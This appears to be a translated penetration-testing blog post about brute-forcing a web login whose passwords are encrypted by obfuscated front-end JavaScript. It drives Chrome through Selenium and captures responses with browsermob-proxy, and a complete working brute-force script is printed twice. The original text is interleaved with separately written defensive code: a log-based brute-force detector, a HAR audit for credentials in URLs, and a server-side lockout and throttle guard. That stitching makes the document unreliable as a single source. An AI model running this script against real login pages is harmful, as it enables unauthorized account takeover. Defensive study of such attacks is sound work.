2025-01-17 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
JaFak is a tool for brute-forcing account passwords without touching the JS front-end encryption. Many people with little experience do not know how to approach this, so this article summarizes the cause of the problem and the solution; I hope it helps you solve it.
I almost gave up.
So I decided to do something to raise the impact of this finding. My first thought was to brute-force the password of a fixed username, because the login page of this system returns "username or password error!" no matter whether the username or the password is wrong, there is no CAPTCHA, and there is no limit on the number of attempts. Since we had already enumerated a valid username, that prompt is effectively "wrong password, please try again", so the password of that fixed username can be brute-forced. Fire up Burp and go straight at it!
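The three properties listed above (same error message for every failure, no CAPTCHA, no attempt limit) are exactly what server-side authentication logging should surface. The following is an added example, not part of the original article, showing the detection logic a defender would run over such logs: it counts failed logins per (source IP, username) pair inside a sliding window and raises an alert when the count crosses a threshold. The log format and the sample lines are constructed for this example; `parse_line` and `detect_bruteforce` are names chosen here. A system that, like the one in this article, answers every failed login with HTTP 200 and an error body has to log the failure itself, because the status code alone carries no signal.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed sample log (not from the article): timestamp, client IP, method, path,
# optional user= field taken from the login form, and the status the application logged.
SAMPLE_LOG = """\
2024-05-31T10:00:01Z 203.0.113.5 POST /login user=admin status=401
2024-05-31T10:00:02Z 203.0.113.5 POST /login user=admin status=401
2024-05-31T10:00:03Z 203.0.113.5 POST /login user=admin status=401
2024-05-31T10:00:04Z 203.0.113.5 POST /login user=admin status=401
2024-05-31T10:00:05Z 203.0.113.5 POST /login user=admin status=401
2024-05-31T10:00:06Z 203.0.113.5 POST /login user=admin status=401
2024-05-31T10:00:07Z 198.51.100.9 POST /login user=alice status=401
2024-05-31T10:00:09Z 198.51.100.9 POST /login user=alice status=200
2024-05-31T10:05:00Z 203.0.113.5 GET /dashboard status=200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+)"
    r"(?: user=(?P<user>\S+))? status=(?P<status>\d{3})$"
)


def parse_line(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "ip": m["ip"], "method": m["method"],
            "path": m["path"], "user": m["user"], "status": int(m["status"])}


def detect_bruteforce(log_text, threshold=5, window_seconds=60, login_path="/login"):
    """Flag (ip, user) pairs with at least `threshold` failed logins inside a sliding window.

    A failed login is a POST to login_path that the application logged as 401.
    Returns one alert per pair carrying the peak failure count seen in any window.
    """
    windows = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    alerts = {}                    # (ip, user) -> alert dict
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        if rec["status"] != 401:
            continue
        key = (rec["ip"], rec["user"])
        recent = windows[key]
        recent.append(rec["ts"])
        # Drop failures that have fallen out of the window.
        while (rec["ts"] - recent[0]).total_seconds() > window_seconds:
            recent.popleft()
        if len(recent) >= threshold:
            alert = alerts.setdefault(key, {"ip": rec["ip"], "user": rec["user"],
                                            "failures": 0,
                                            "first_seen": recent[0].isoformat(),
                                            "last_seen": None})
            alert["failures"] = max(alert["failures"], len(recent))
            alert["last_seen"] = rec["ts"].isoformat()
    return [alerts[k] for k in sorted(alerts)]


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print("ALERT {ip} -> {user}: {failures} failed logins "
              "between {first_seen} and {last_seen}".format(**a))
```

Run as-is it reports one alert, for the six failures against admin from 203.0.113.5; alice's single failure followed by a success stays below the threshold. Keying on the (IP, username) pair catches the fixed-username attack described in the article; keying on the IP alone would additionally catch password spraying across many accounts.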
Seeing %3D%3D after the password, I got excited: isn't that just base64 (a URL-encoded "==")? Straight to a Python script: base64-encode first, then brute-force. Comfortable. Just wait for the password to drop out!
But first, to verify that it really is base64, I put it into Burp's decoder. Damn, it doesn't decode. I didn't believe it at first and tried several times, but no, it really doesn't!
Fine. Calm down! This is cryptography; the encryption logic can be reversed with a bit of effort. Oh, my God, by hand?
Then I opened the JS for source code analysis. Wonderful: an obfuscated tangle that wrapped my ideas up like a ball of wire!
I was ready to retreat: goodbye project, goodbye cybersecurity, goodbye working life, go home and farm.
A wild idea
But I did not think it was over yet; there was still a way out. I had seen experts set up a local service that calls the system's own JS and then reuse it for their own purposes, but that still requires finding the entry point of the encryption function. Burp also has plugins for this, and local services too, but again you have to find the encryption entry function! I really admire the experts who are good at front-end debugging.
I also remembered a foreign performance-testing tool I had seen before (I don't remember the name, but it was quite expensive) that could drive the browser automatically for performance tests, like a robot typing for you, submitting for you and visiting the website for you. I thought that was cool, and when I thought about how to achieve it, automation immediately made me think of Python. A Google search showed it really exists!
(Baidu won't find it; Google will.)
Thus begins a bizarre journey.
Why call it bizarre? Because the story of climbing out of the pits is all snot and tears. Enough, I'm crying in the toilet.
Start with the Selenium framework...
What is Selenium? In a word: an automated testing tool.
It supports many browsers, including the mainstream ones with a UI such as Chrome, Safari and Firefox. With the Selenium driver for one of these browsers installed, you can easily test a web interface; in other words, Selenium supports these browser drivers.
The stack used here is python + selenium + browsermobproxy.
First taste
Let's start with a small example to get a feel for Selenium. Here we use Chrome for the test (of course you can switch to another browser; it makes no difference).
Note that you need to have Chrome installed before you run this code.
from selenium import webdriver

browser = webdriver.Chrome()
browser.get('http://www.baidu.com/')
Run this code and it automatically opens Chrome and then loads http://www.baidu.com/. It is fully visual: you watch your Chrome browser open and browse.
If the code fails and the browser does not open, either Chrome is not installed or the Chrome driver is not configured in your environment variables. Download the driver and add the directory containing it to your PATH.
But just opening a web page is not enough for our test; we need to submit the username and password being brute-forced, so:
from selenium import webdriver
from selenium.webdriver.common.keys import Keys

driver = webdriver.Chrome()
driver.get("http://www.python.org")
assert "Python" in driver.title  # wait until the page has loaded
elem = driver.find_element_by_name("q")  # the search box is named "q"
elem.send_keys("pycon")
elem.send_keys(Keys.RETURN)
print(driver.page_source)
This code opens http://www.python.org and, once the page title contains "Python", walks the HTML tree, finds the element whose name is q, types pycon into it and simulates pressing Enter.
Why wait for loading? Because the site's jQuery and so on may not be fully loaded yet, and clicking too early loses the intended effect.
According to my actual needs, I changed this code to the following:
from selenium import webdriver
from selenium.webdriver.common.keys import Keys

driver = webdriver.Chrome()
driver.get("xxxxxxxx")
# find the username input and type the username (username/password are supplied by the caller)
driver.find_element_by_css_selector("[class='class_name']").send_keys(username)
# find the password input and type the password
driver.find_element_by_css_selector("[class='class_name']").send_keys(password)
# find the login button and click it
driver.find_element_by_css_selector("[class='class_name']").click()
This simulates a complete username and password entry plus a click on the login button.
Pit 1: why use css_selector here? You could use by_class_name directly, but my actual scenario was special: the class attribute contains spaces (several class names), which by_class_name cannot match. If the class name has no space, you can fetch it directly. Of course, you can also locate the element through other attributes of the tag.
But this only submits one login request; you have to clear the username and password entered last time before the next attempt. Improving it:
from selenium import webdriver
from selenium.webdriver.common.keys import Keys

driver = webdriver.Chrome()
driver.get("xxxxxxxx")
# wrap the following in a loop over the password list
# find the username input and type the username
driver.find_element_by_css_selector("[class='class_name']").send_keys(username)
# find the password input and type the password
driver.find_element_by_css_selector("[class='class_name']").send_keys(password)
# find the login button and click it
driver.find_element_by_css_selector("[class='class_name']").click()
# clear both inputs so the next iteration starts from empty fields
driver.find_element_by_css_selector("[class='class_name']").clear()
driver.find_element_by_css_selector("[class='class_name']").clear()
Add a loop on top of this and you can brute-force the password in batch, because Chrome has automatically loaded and run the JS that encrypts the password for us before sending it. How nice!
But there is a problem: I could not capture the server's response. At first I tried to use Selenium to read chromedriver's network traffic.
Analyzing the captured traffic that way is very hard, so instead I used browsermobproxy to open an intermediate proxy: Chrome goes through browsermobproxy first, browsermobproxy captures my HTTP traffic, and then I can read the server's response. Very nice!
Browsermob-Proxy is an open-source proxy service written in Java and based on LittleProxy. It works much like Fiddler or Charles: it opens a port and acts as a standard proxy, and once an HTTP client (a browser, etc.) is configured to use that proxy, it can capture every request in detail and the content returned.
Installation:
Download the archive from the project's GitHub releases page: https://github.com/lightbody/browsermob-proxy/releases. Linux and Windows are supported.
Install the corresponding Python package:
pip install browsermob-proxy
After downloading browsermob-proxy, put it in a directory of your choice, for example D:\apk\browsermob-proxy-2.1.4-bin\browsermob-proxy-2.1.4. The example code is then:
from browsermobproxy import Server

server = Server("path")  # path to the browsermob-proxy launcher
server.start()
proxy = server.create_proxy()
Configure the proxy and start WebDriver:
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

chrome_options = Options()
chrome_options.add_argument('--proxy-server={0}'.format(proxy.proxy))
driver = webdriver.Chrome(chrome_options=chrome_options)
Worth noting:
The browsermob-proxy Server listens on port 8080 by default.
You can edit the Server class directly to change its listening port.
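browsermob-proxy hands the captured traffic back as a HAR dictionary (`proxy.har`, with the `log.entries[].request` / `response` layout used by the scanner later in this article). The following is an added example, not part of the original article, that reads that layout and performs the checks a reviewer would want on a captured login flow: whether a credential-like parameter travels in a URL query string (where it ends up in proxy and server logs) and whether such a request went over plain http. The HAR content is constructed; `SENSITIVE_PARAMS`, `audit_har` and `login_responses` are names chosen here.

```python
import json
from urllib.parse import urlsplit, parse_qsl

# Parameter names that should never travel in a URL query string.
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "token", "secret"}

# Constructed HAR fragment (same log.entries[].request/response layout browsermob-proxy emits).
SAMPLE_HAR = {
    "log": {
        "entries": [
            {   # login submitted with credentials as GET parameters over plain http
                "request": {"method": "GET",
                            "url": "http://example.test/login?username=admin&password=MTIzNDU2PT0%3D"},
                "response": {"status": 200, "content": {
                    "mimeType": "application/json",
                    "text": "{\"code\": 1, \"msg\": \"username or password error!\"}"}},
            },
            {   # the same flow done properly: POST body, TLS
                "request": {"method": "POST", "url": "https://example.test/api/login"},
                "response": {"status": 200, "content": {
                    "mimeType": "application/json", "text": "{\"code\": 0}"}},
            },
            {   # unrelated static asset
                "request": {"method": "GET", "url": "https://example.test/static/app.js"},
                "response": {"status": 200, "content": {
                    "mimeType": "application/javascript", "text": ""}},
            },
        ]
    }
}


def load_har(path):
    """Read a HAR file saved to disk (browsermob-proxy's proxy.har has the same structure)."""
    with open(path, "r", encoding="utf-8") as f:
        return json.load(f)


def audit_har(har):
    """Return findings for requests that expose credentials or use cleartext transport."""
    findings = []
    for entry in har["log"]["entries"]:
        req = entry["request"]
        parts = urlsplit(req["url"])
        query_keys = {k.lower() for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
        leaked = sorted(query_keys & SENSITIVE_PARAMS)
        if leaked:
            findings.append({"url": req["url"], "issue": "credential in query string",
                             "params": leaked})
        # A credential in the URL or a form POST over http is readable by anyone on the path.
        if parts.scheme == "http" and (leaked or req["method"] == "POST"):
            findings.append({"url": req["url"], "issue": "cleartext transport"})
    return findings


def login_responses(har, path_marker="login"):
    """Pair each request whose path mentions the login endpoint with the body the server returned."""
    pairs = []
    for entry in har["log"]["entries"]:
        url = entry["request"]["url"]
        if path_marker in urlsplit(url).path:
            pairs.append((url, entry["response"]["content"].get("text", "")))
    return pairs


if __name__ == "__main__":
    for finding in audit_har(SAMPLE_HAR):
        print(finding)
    for url, body in login_responses(SAMPLE_HAR):
        print(url, "->", body)
```

On the constructed capture the first entry produces two findings (password in the query string, sent over http) and the POST over https produces none. Matching on the URL path rather than on substrings of the whole URL avoids false hits from query values that happen to contain the marker.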
Adapted directly to the actual test requirements, the final code:
import os
import argparse
import sys
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from browsermobproxy import Server
from selenium.webdriver.chrome.options import Options


class Brower_scan():
    def __init__(self, url, username, password_dir):
        self.url = url
        self.response_result = []
        self.result = {}
        self.init_browsermobproxy()
        self.init_chrome()
        self.init_dict_list(username, password_dir)
        self.result_handing()
        self.end_env()

    def init_dict_list(self, username, password_dir):
        with open(password_dir, "r") as f:
            self.password_list = f.readlines()
        for password in self.password_list:
            self.fill_out_a_form(username, password.replace('\n', ''))
            self.wget_response()

    def init_browsermobproxy(self):
        self.server = Server("browsermob-proxy-2.1.4\\bin\\browsermob-proxy.bat")  # browsermobproxy file location
        self.server.start()
        self.proxy = self.server.create_proxy()
        self.chrome_options = Options()
        self.chrome_options.add_argument('--proxy-server={0}'.format(self.proxy.proxy))
        self.chrome_options.add_argument('--headless')  # run Chrome without a window; saves startup time

    def init_chrome(self):
        try:
            self.chrome = webdriver.Chrome(chrome_options=self.chrome_options)
            self.proxy.new_har("ht_list2", options={'captureContent': True})
            self.chrome.get(self.url)
        except Exception as e:
            print("Chrome browser startup failed!\n")
            return 0

    def fill_out_a_form(self, username, password):
        self.chrome.find_element_by_css_selector("[class='ivu-input ivu-input-with-prefix']").send_keys(username)
        self.chrome.find_element_by_css_selector("[class='ivu-input ivu-input-with-suffix']").send_keys(password)
        self.chrome.find_element_by_css_selector("[class='ivu-btn ivu-btn-primary ivu-btn-large']").click()
        self.chrome.find_element_by_css_selector("[class='ivu-input ivu-input-with-prefix']").clear()
        self.chrome.find_element_by_css_selector("[class='ivu-input ivu-input-with-suffix']").clear()

    def wget_response(self):
        result = self.proxy.har
        for entry in result['log']['entries']:
            _url = entry['request']['url']
            print(_url)
            if "password" in _url and "username" in _url:
                _response = entry['response']
                _content = _response['content']  # the content returned by the API
                self.response_result.append(_response['content']['text'])
        self.result = dict(zip(self.password_list, self.response_result))

    def result_handing(self):
        for key, value in self.result.items():
            print("password: {key}: result: {result}".format(key=key, result=value))

    def end_env(self):
        try:
            self.server.stop()
            self.chrome.quit()
            find_netstat = os.popen("netstat -ano | findstr 8080")  # locate the proxy process
            pid = find_netstat.read().split()[4]
            kail_pid = os.popen("taskkill /F /PID {PID}".format(PID=pid))
            print(kail_pid.read())
            return 1
        except IndexError as e:
            return 0


url = "xxxxxxxx"  # login page under test
Brower = Brower_scan(url, 'admin', 'password.txt')
Here is the actual brute-force run:
Pit 2:
The actual result was not what I expected.
The passwords entered were 123456 123456456789 123456455678955664, growing each time, as if the field was never cleared, but I did clear it.
This puzzled me for a long time.
Finally, with the guidance of the department's expert, I found the cause and fixed it. Truly, one word from a master beats 10 years of study!
The browser remembers the last password by default: when I type the admin account and a password, the browser remembers the account even though the login failed; when I type admin again, the browser autocompletes 123456, then I type 456789, and the result is 123456456789. That's it.
All you have to do is change the order:
self.chrome.find_element_by_css_selector("[class='class_name']").clear()
self.chrome.find_element_by_css_selector("[class='class_name']").send_keys(username)
self.chrome.find_element_by_css_selector("[class='class_name']").clear()
self.chrome.find_element_by_css_selector("[class='class_name']").send_keys(password)
self.chrome.find_element_by_css_selector("[class='class_name']").click()
You just need to clear the field again right before typing, i.e. after the browser's autocomplete has filled it.
Pit 3:
If the login button is triggered with click(), an error is raised after too many clicks because the element is wrapped by another element. The solution is to use send_keys():
self.chrome.find_element_by_css_selector("[class='class_name']").send_keys(Keys.RETURN)
All right, the main pits are solved here. There were actually many more; I have only listed the main ones. Now the final code:
import os
import argparse
import sys
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from browsermobproxy import Server
from selenium.webdriver.chrome.options import Options


class Brower_scan():
    def __init__(self, url, username, password_dir):
        self.url = url
        self.response_result = []
        self.result = {}
        self.init_browsermobproxy()
        self.init_chrome()
        self.init_dict_list(username, password_dir)
        self.result_handing()
        self.end_env()

    def init_dict_list(self, username, password_dir):
        with open(password_dir, "r") as f:
            self.password_list = f.readlines()
        for password in self.password_list:
            self.fill_out_a_form(username, password.replace('\n', ''))
            self.wget_response()

    def init_browsermobproxy(self):
        self.server = Server("browsermob-proxy-2.1.4\\bin\\browsermob-proxy.bat")  # browsermobproxy file location
        self.server.start()
        self.proxy = self.server.create_proxy()
        self.chrome_options = Options()
        self.chrome_options.add_argument("--incognito")
        self.chrome_options.add_argument('--proxy-server={0}'.format(self.proxy.proxy))
        self.chrome_options.add_argument('--headless')  # run Chrome without a window; saves startup time

    def init_chrome(self):
        try:
            self.chrome = webdriver.Chrome(chrome_options=self.chrome_options)
            self.proxy.new_har("test", options={'captureContent': True, 'captureHeaders': True})
            self.chrome.get(self.url)
        except Exception as e:
            print("Chrome browser startup failed!\n")
            return 0

    def fill_out_a_form(self, username, password):
        print(password)
        # clear the username input
        self.chrome.find_element_by_css_selector("[class='class_name']").clear()
        # enter the username
        self.chrome.find_element_by_css_selector("[class='ivu-input ivu-input-large ivu-input-with-prefix']").send_keys(username)
        # clear the password input
        self.chrome.find_element_by_css_selector("[class='ivu-input ivu-input-large ivu-input-with-prefix ivu-input-with-suffix']").clear()
        # enter the password
        self.chrome.find_element_by_css_selector("[class='class_name']").send_keys(password)
        # press Enter to log in
        self.chrome.find_element_by_css_selector("[class='class_name']").send_keys(Keys.RETURN)

    def wget_response(self):
        result = self.proxy.har
        for entry in result['log']['entries']:
            _url = entry['request']['url']
            if "password" in _url and "username" in _url:
                _response = entry['response']
                _content = _response['content']  # the content returned by the API
                self.response_result.append(_response['content']['text'])
        self.result = dict(zip(self.password_list, self.response_result))

    def result_handing(self):
        for key, value in self.result.items():
            print("password: {key}: result: {result}".format(key=key, result=value))

    def end_env(self):
        try:
            self.server.stop()
            self.chrome.quit()
            find_netstat = os.popen("netstat -ano | findstr 8080")  # locate the proxy process
            pid = find_netstat.read().split()[4]
            kail_pid = os.popen("taskkill /F /PID {PID}".format(PID=pid))
            print(kail_pid.read())
            return 1
        except IndexError as e:
            return 0


url = "xxxxxxxx"  # login page under test
Brower = Brower_scan(url, 'admin', 'password.txt')
Here this approach is used only for password brute-forcing, but the real scenarios go far beyond that. I think it can be used against any JS encryption, jQuery encryption or other front-end encryption: there is no need to analyze the front-end encryption code at all, you only need to simulate the behaviour of a normal user. I have to say, this approach is really convenient. It smells so good! At the moment the input boxes and the login button can only be located by class; modify the source if you need to use id or other identifiers.
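The conclusion above holds because the browser runs the site's own JS, so from the server's side an automated browser and a real user look the same; front-end encryption protects nothing against this. The controls that do stop it live on the server. The following is an added example, not the article's code, of a minimal Python login guard that pairs a proper password hash with the two server-side limits the system in this article lacked: a per-account lockout after repeated failures and a per-source-IP throttle. The user store, the salt and the limits are constructed for the example; `LoginGuard` and `verify_password` are names chosen here.

```python
import hashlib
import hmac
from collections import defaultdict, deque

PBKDF2_ITERATIONS = 100_000  # kept modest so the example runs quickly; raise it in production


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


# Constructed demo store: username -> (salt, hash). Real systems use a random per-user salt.
DEMO_SALT = bytes(range(16))
USERS = {"admin": (DEMO_SALT, hash_password("correct horse battery staple", DEMO_SALT))}
# Compared against when the username does not exist, so timing does not reveal valid names.
_DUMMY_HASH = hash_password("dummy", DEMO_SALT)


def verify_password(username, password, users=USERS):
    """Constant-time check that does the same amount of work for unknown usernames."""
    salt, stored = users.get(username, (DEMO_SALT, _DUMMY_HASH))
    candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored) and username in users


class LoginGuard:
    """Server-side brake on login attempts: per-account lockout plus per-IP throttle."""

    def __init__(self, max_failures=5, lock_seconds=900, ip_limit=20, ip_window_seconds=60):
        self.max_failures = max_failures
        self.lock_seconds = lock_seconds
        self.ip_limit = ip_limit
        self.ip_window = ip_window_seconds
        self.failures = defaultdict(int)    # username -> consecutive failures
        self.locked_until = {}              # username -> unix time the lock expires
        self.ip_hits = defaultdict(deque)   # ip -> timestamps of recent attempts

    def attempt(self, ip, username, password, now):
        """Return 'throttled', 'locked', 'invalid' or 'ok'. `now` is unix time, injected for testing."""
        hits = self.ip_hits[ip]
        while hits and now - hits[0] > self.ip_window:
            hits.popleft()
        if len(hits) >= self.ip_limit:
            return "throttled"          # too many attempts from this source, whatever the account
        hits.append(now)

        if now < self.locked_until.get(username, 0):
            return "locked"             # correct password or not, the account is cooling down

        if verify_password(username, password):
            self.failures[username] = 0
            return "ok"

        self.failures[username] += 1
        if self.failures[username] >= self.max_failures:
            self.locked_until[username] = now + self.lock_seconds
            self.failures[username] = 0
        return "invalid"                # the client sees only a generic "username or password error"


if __name__ == "__main__":
    guard = LoginGuard()
    for t, pw in enumerate(["123456", "password", "admin", "qwerty", "letmein", "correct horse battery staple"]):
        print(t, pw, "->", guard.attempt("203.0.113.5", "admin", pw, now=t))
```

The fifth wrong guess locks the account, so the sixth attempt is refused even though the password is right; the lock expires on its own, which limits the denial-of-service an attacker can cause by locking accounts deliberately. The per-IP window is independent of the account, so spraying one password across many usernames from one address is throttled too. In a multi-process deployment the counters belong in shared storage rather than in-process dictionaries.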
After reading the above, have you mastered how to use JaFak, the account password brute-forcing tool that bypasses JS front-end encryption? If you want to learn more skills or find out more, you are welcome to follow the industry information channel. Thank you for reading!